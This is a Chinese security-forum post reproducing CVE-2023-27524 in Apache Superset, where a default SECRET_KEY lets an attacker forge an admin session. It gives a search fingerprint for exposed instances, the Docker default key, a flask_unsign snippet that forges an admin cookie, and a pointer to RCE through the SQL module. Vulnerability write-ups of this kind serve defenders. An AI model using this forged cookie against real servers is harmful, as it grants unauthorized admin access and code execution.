安全矩阵

 找回密码
 立即注册
搜索
查看: 666|回复: 0

Apache Superset SECRET_KEY 未授权访问漏洞 CVE-2023-27524

[复制链接]

417

主题

417

帖子

2391

积分

金牌会员

Rank: 6Rank: 6

积分
2391
发表于 2023-5-1 11:51:38 | 显示全部楼层 |阅读模式
本帖最后由 ivi 于 2023-5-1 11:55 编辑





漏洞描述
Apache Superset 是一款现代化的开源大数据工具,也是企业级商业智能 Web 应用,用于数据探索分析和数据可视化。它提供了简单易用的无代码可视化构建器和声称是最先进的 SQL 编辑器,用户可以使用这些工具快速地构建数据仪表盘。CVE-2023-27524 中,未经授权的攻击者可根据默认配置的SECRET_KEY伪造成管理员用户访问Apache Superset。
漏洞影响
Apache Superse <= 2.0.1
网络测绘
app.name="Apache Superset"
漏洞复现
登陆页面
漏洞修复补丁
  1. https://github.com/apache/superset/pull/23186/files
复制代码



补丁代码中,新建了判断用户是否使用了默认的Key进行配置,如果为默认的Key,就直接中断启动,。但在 Docker的 env 下还是添加了固定的 Key: TEST_NON_DEV_SECRET
  1. <blockquote># https://github.com/horizon3ai/CVE-2023-27524/blob/main/CVE-2023-27524.py
复制代码
这里拿Docker下的环境举例
初次请求时会获取到 Cookie, 使用默认Key验证 Cookie是否可被伪造




登陆主页面观察主要参数


通过设置参数 user_id 和 _user_id 为 1 ,构造加密Cookie

  1. >>> from flask_unsign import session
  2. >>> session.sign({'_user_id': 1, 'user_id': 1},'TEST_NON_DEV_SECRET')
  3. 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZE51uw.EdD7zSzojgY4keqZLOKR4GndJf8'
复制代码


利用构造的 Cookie就可以获取到 Web后台管理权限, 后台中存在数据库语句执行模块,通过设置允许执行其他数据库语句后利用数据库语句 RCE




关注公众号

  1. <blockquote>下面就是文库的公众号啦,更新的文章都会在第一时间推送在交流群和公众号
复制代码
支持作者



关于文库

  1. <blockquote>在线文库: https://wiki.peiqi.tech (暂时关闭个人用户使用)
复制代码




文库动态



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 16:50 , Processed in 0.013080 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表